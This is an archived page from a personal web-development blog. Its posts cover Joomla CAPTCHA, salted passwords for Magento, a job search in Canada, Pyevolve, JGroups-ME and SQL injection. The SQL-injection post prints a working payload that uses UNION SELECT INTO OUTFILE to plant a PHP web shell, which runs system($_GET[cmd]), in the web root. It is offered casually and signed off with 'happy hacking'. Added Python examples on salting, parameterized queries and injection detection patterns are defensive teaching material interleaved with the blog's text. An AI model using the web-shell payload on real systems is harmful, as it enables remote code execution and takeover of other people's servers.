who needs social life when you have broadband?

Inventas vitam iuvat excoluisse per artes / Let us improve life through science and art.

Archive for the 'Programming' Category

How to add CAPTCHA to Joomla!’s com_contact component

The Dev team has just released Joomla! 1.5 stable. This is great news (after two and a half years of development we finally can use the new baby in a production environment), but I’ve seen that an old problem hasn’t been solved yet: people still get a lot of spam due to a weak (or nonexistent) mechanism to check whether the e-mails sent through com_contact come from real people or from spambots.

The beauty of open source is that anyone can change and improve a piece of software. So, here’s my $0.02: changing com_contact so that it can work with your favorite Captcha plugin! (all files are downloadable at the end of this article)

35 comments

Improve Magento’s security with salted passwords

It’s been a long time without new posts on my English blog :) Sorry about that, guys. I’ve been busy with the Portuguese blog (which gives me more feedback than this one…)

Last week I discovered Magento. This is the best open source eCommerce system I’ve seen so far. Unfortunately I haven’t seen too much activity from the core team (three days with no commits in the SVN repository, and nobody has tested my suggestions to the code…). I guess it must be the holidays.

Anyway, the beauty of open source is collaboration. So I started doing my part and implemented salted passwords in Magento.

Why?

We all know that rainbow tables are getting bigger and bigger every day, and while studying Magento’s code I realised that they were storing passwords using a simple md5() function. That can be quite dangerous, especially for e-commerce software :).

In a couple of hours I came up with this simple solution to implement salted passwords without messing with Magento’s core package (although you will need to change the database, so PLEASE!! I’M BEGGING YOU TO CREATE A BACKUP BEFORE TRYING THIS!)

Here is the README file:

Salted Passwords in Magento
—————————-

This is a hack. There are no guarantees that your system will remain working smoothly :P

Install
——–

1 - Make sure you change the size of your password field. You may run something like this in MySQL:

ALTER TABLE `admin_user` CHANGE `password` `password` VARCHAR( 60 )

2 - Sign in to the Magento admin (this is important because you’ll need to create a new user to start using salted passwords)

3 - Untar/unzip this file in your Magento root folder (all files will be placed under the /community/ directory, so you won’t lose anything if it doesn’t work)

4 - Create a new Magento user and give him administrator privileges (your current user won’t work anymore unless you change its password)

FAQ
—-

Q - I cannot log in anymore!
A - I TOLD YOU TO LOG IN BEFORE UNZIPPING. You cannot log in because the existing users don’t use salted passwords and the new authentication method does. Here’s a workaround for this problem:

- Go to your phpMyAdmin (or any other software you use to manage your MySQL database)
- Browse the admin_user table
- Change your user’s password to: 5cf88201ea7be9037b934ec850c01a89:pQEuqfwbpJ
- Your new password is “changeMe” (without quotes)
- Log in and change your password to the old one.

Now that you’ve read the README file, you are ready to download and try salted passwords for Magento 0.7.1800.

Download it here and let me know if it worked for you as well as it worked for me :D
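The point of the post is that an unsalted md5() is a lookup key for a precomputed table, while a per-user salt is not. The example below is added here and is not the Magento hack described above; it is written in Python rather than PHP so that it runs stand-alone. It uses the same stored format as the README (hex md5, a colon, then the salt), but the concatenation order (salt then password) and the 10-character alphanumeric salt are assumptions. It goes one step beyond the hack by also accepting the legacy unsalted format, so existing users can keep logging in until they reset, and it ends with a slow key-derivation variant as the natural next step after salting.

```python
import hashlib
import hmac
import secrets
import string
from typing import Dict, Iterable, Optional

# Stored format from the README: "<md5 hex>:<salt>". Which side the salt is
# concatenated on is an assumption of this example, not taken from the page.
SALT_ALPHABET = string.ascii_letters + string.digits
SALT_LENGTH = 10  # matches the length of the README's sample salt


def legacy_md5(password: str) -> str:
    """Unsalted md5, the scheme the post says Magento 0.7 used."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def make_salt(length: int = SALT_LENGTH) -> str:
    """Random per-user salt from a CSPRNG (not random() or time())."""
    return "".join(secrets.choice(SALT_ALPHABET) for _ in range(length))


def salted_md5(password: str, salt: Optional[str] = None) -> str:
    """md5(salt + password) stored together with the salt."""
    if salt is None:
        salt = make_salt()
    digest = hashlib.md5((salt + password).encode("utf-8")).hexdigest()
    return f"{digest}:{salt}"


def verify(password: str, stored: str) -> bool:
    """Check a password against either format; constant-time comparison."""
    if ":" in stored:
        _, salt = stored.split(":", 1)
        return hmac.compare_digest(salted_md5(password, salt), stored)
    # Legacy row (no salt): still verifiable, so a migration on next login
    # is possible instead of locking every existing user out.
    return hmac.compare_digest(legacy_md5(password), stored)


def build_precomputed_table(wordlist: Iterable[str]) -> Dict[str, str]:
    """Stand-in for a rainbow table: md5 -> password, computed once."""
    return {legacy_md5(word): word for word in wordlist}


def crack_with_table(stored: str, table: Dict[str, str]) -> Optional[str]:
    """Look the stored digest up. A salted digest is md5(salt+password),
    which no table built from passwords alone contains."""
    digest = stored.split(":", 1)[0]
    return table.get(digest)


# Salting stops precomputation but md5 is still fast enough to brute-force
# one user at a time. A deliberately slow KDF is the follow-on fix.
KDF_ITERATIONS = 200_000


def kdf_hash(password: str, salt: Optional[bytes] = None) -> str:
    if salt is None:
        salt = secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt,
                             KDF_ITERATIONS)
    return f"pbkdf2:{KDF_ITERATIONS}:{salt.hex()}:{dk.hex()}"


def kdf_verify(password: str, stored: str) -> bool:
    _, iters, salt_hex, dk_hex = stored.split(":", 3)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    # Constructed wordlist; "changeMe" is the README's recovery password.
    table = build_precomputed_table(["123456", "password", "changeMe"])
    print("unsalted cracked:", crack_with_table(legacy_md5("changeMe"), table))
    print("salted cracked:  ", crack_with_table(salted_md5("changeMe"), table))
```

The widened VARCHAR(60) column in step 1 is what makes room for the colon and the salt next to the 32-character digest. With a row in the `hash:salt` format, the FAQ's "set the column by hand" recovery works exactly as described: whoever knows the salt can compute the matching digest for a chosen password.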

No comments

To: my future Canadian boss :-)

Hello!

I’m not sure if this post is going to help me or not but I’m blogging anyway :)

Fact is, I wanna move to Canada. I’ve had enough of hot summers and would like to experience living abroad (again). So, if you are Canadian, please check my résumé by clicking here and hire me hehehe. If you want, you may contact me directly by e-mail: bigodines ||at|| joomla.com.br

If you’re not sure whether it is worth reading my résumé: I’m the main developer of two of the most famous Joomla! sites around the globe, Porsche and UNRIC (please note: developer != designer). Ok, that sounds like I’m trying to impress :/. I don’t like these self-promotion lines, but sometimes we need them :-)

Now, the bad news:
I’ve been reading about visas and it seems that a permanent work permit for skilled professionals (according to those HSMP calculators I found on the web, I am a skilled professional :-P) can take up to 14 months. A friend told me that if I manage to find a company interested in my services, this waiting time may be shorter (I’m still checking this information).

There is also another alternative: I can go to Canada as a student and work legally 20 hrs/week while waiting for my permanent visa… but first I need some networking contacts in Canada.

Drop me a line if you need a responsible, dynamic, nerdy web developer :P

No comments

Bigo Captcha 1.0 released :-D

Today I created my first Joomla! 1.5 extension. It’s a Captcha plugin. My friends were complaining that it was impossible to comment on my Portuguese blog, so I created this quick-and-funny captcha plugin which can be used with yvComment (or any component you want, because it is really generic).

I’m using the same structure as OSTCaptcha by CoolAcid, so the replacement should be transparent.

Download is available here

You may see a demo by visiting my Portuguese blog (see the comment plugin..)

1 comment

Pyevolve - A Python Genetic Algorithms Framework

Hello, this is my redemption post after the long time without activity on the blog. I’m working on a complete Python genetic algorithms framework with many features; for now it is still under development, but there is an alpha version and some examples on Google Project Hosting.

I’m doing my best to release new versions as soon as possible; I hope that this project will be used, since there are no good, easy-to-use GA frameworks in languages like Python.

http://code.google.com/p/pyevolve/

- Perone

No comments

JGroups-ME update

Today I’ve finished migrating JGroups-ME to version 2.4.1sp4 of JGroups. I’ve also finished porting the GossipRouter (created a MobileGossipRouter midlet that initializes it) and now we have a 100% mobile group communication toolkit which allows the creation of group communication systems for mobile computing!

Next step is to implement Bluetooth support (I’ll do this just after I finish writing my paper about JGroups-ME) and submit my version to the JGroups project so they can take a look and (maybe) commit to the official JGroups-ME version.

More on this subject soon. Please stay tuned ;P

No comments

(real life) next steps in sql injection

We all know SQL injection and a bunch of techniques to exploit it... I've decided to blog about a "new" one. Please don't consider this "advanced SQL injection", because it's not :D

MySQL is a great database management system and it allows you to do many things with the "select" statement. Wouldn't that be TOO many things?

I guess everyone knows the basic "' or 1=1 /*" and its variants... but accessing restricted areas, changing user info and dropping tables aren't the only cool things you can do with SQL injections.

There is a feature that allows you to save your select into a file. It's called SELECT INTO FILE (duh!), and things can get pretty dangerous if you use it with an SQL injection.

Isn't it clear enough yet? Ok, let me try to help you get the big picture.

What if someone inserts this code:

SQL:
' union select ''<?php ini_set(\"max_execution_time\",0); system($_GET[cmd]); /*'',0,0,0,'*/ ?>' into outfile ' /home/mysite/lol.php' from users #

Please notice that you'll need to know the document root path, but this shouldn't be a problem with vulnerable PHP systems.

Well, I don't intend to give you a cookbook and promote n00bism. So, if you still haven't figured out how to take advantage of this, you probably shouldn't use it. Google might help you as well :)

happy hacking.

PS: syntax errors were generated on purpose.
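Everything in the post, from the basic "' or 1=1 /*" to the file write, depends on user input being spliced into the SQL text. The example below is added here and is not the author's code; it shows the vulnerable query pattern beside its parameterized form, on a constructed in-memory SQLite table standing in for the post's `users` table, plus a small marker check of the kind a defender would run over request logs. Python and SQLite are used so it runs offline; the table name and columns are assumptions, and the marker list is illustrative.

```python
import re
import sqlite3
from typing import List

# Constructed sample data; stands in for the "users" table named in the post.
SAMPLE_USERS = [("alice", "s3cret"), ("bob", "hunter2")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_unsafe(conn: sqlite3.Connection, username: str, password: str) -> List[str]:
    """Vulnerable pattern: input becomes part of the SQL grammar, so a quote
    in the username closes the literal and a comment swallows the rest."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return sorted(row[0] for row in conn.execute(sql))


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> List[str]:
    """Hardened pattern: placeholders keep the input as data. The same
    payload is compared against the column as a literal string."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return sorted(row[0] for row in conn.execute(sql, (username, password)))


# Markers worth alerting on in request parameters. Signature matching is a
# detection aid for log review, not a substitute for parameterized queries.
INJECTION_MARKERS = re.compile(
    r"(union\s+select|into\s+(out|dump)file|'\s*or\s+\d+\s*=\s*\d+|/\*)",
    re.IGNORECASE,
)


def looks_like_injection(value: str) -> bool:
    return INJECTION_MARKERS.search(value) is not None


if __name__ == "__main__":
    conn = make_db()
    payload = "' or 1=1 /*"
    print("unsafe:", login_unsafe(conn, payload, "anything"))   # every user
    print("safe:  ", login_safe(conn, payload, "anything"))     # no rows
    print("flagged:", looks_like_injection(payload))
```

Two server-side checks go with this. In MySQL, `SELECT ... INTO OUTFILE` needs the FILE privilege and is further limited by `secure_file_priv`, so the account a web application connects with should not hold that privilege; and the web server should not have write access to its own document root from the database process, which is what turns a file write into code execution in the post's scenario.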

No comments

too soon…

Remember when I said I'd found the best image generator class? It turned out that this class isn't everything I said previously. Actually it promises a lot of stuff, but still has too many bugs (for example, you cannot create a simple PNG with a transparent background, and I've also had trouble centering my text).

At least this class was well written and has been easy to customize.

No comments

the best title generator class ever

I was looking for a dynamic title generator class and found this project. It is bloody easy to use/understand/modify and very flexible... I'm about to test the "bgimage" feature but I'm pretty impressed so far.

If you want to see what this library can do for you, check this website.

No comments

It’s all about opensource

I spent the whole afternoon yesterday trying to port my dynamic form generator made with JQuery to Mootools. I'm almost there (but "almost" is not "there" yet, and the script is raising some really weird arbitrary errors. Odd...). But why would I change from JQuery to Mootools?

That's a very interesting question (I'm actually asking myself every 5 minutes). The [partial] answers are the following:
- Joomla! 1.5 uses Mootools. As working with Joomla! still pays the bills around here, I must adapt to it :)
- I don't wanna load two different JS frameworks that do the same thing (or not!) in my components.
- It is always good to learn new stuff, even if, in the end, your conclusion is: It was a total waste of time learning this crap. This sux! (as I did with Dojo).
- I need to post new stuff on my blog; what could be better than a comparison between JQuery && Mootools from a regular developer's point of view? It's gonna be fun :D

For now, all I have to say is: [IMHO] Mootools' learning curve is longer than JQuery's.

No comments
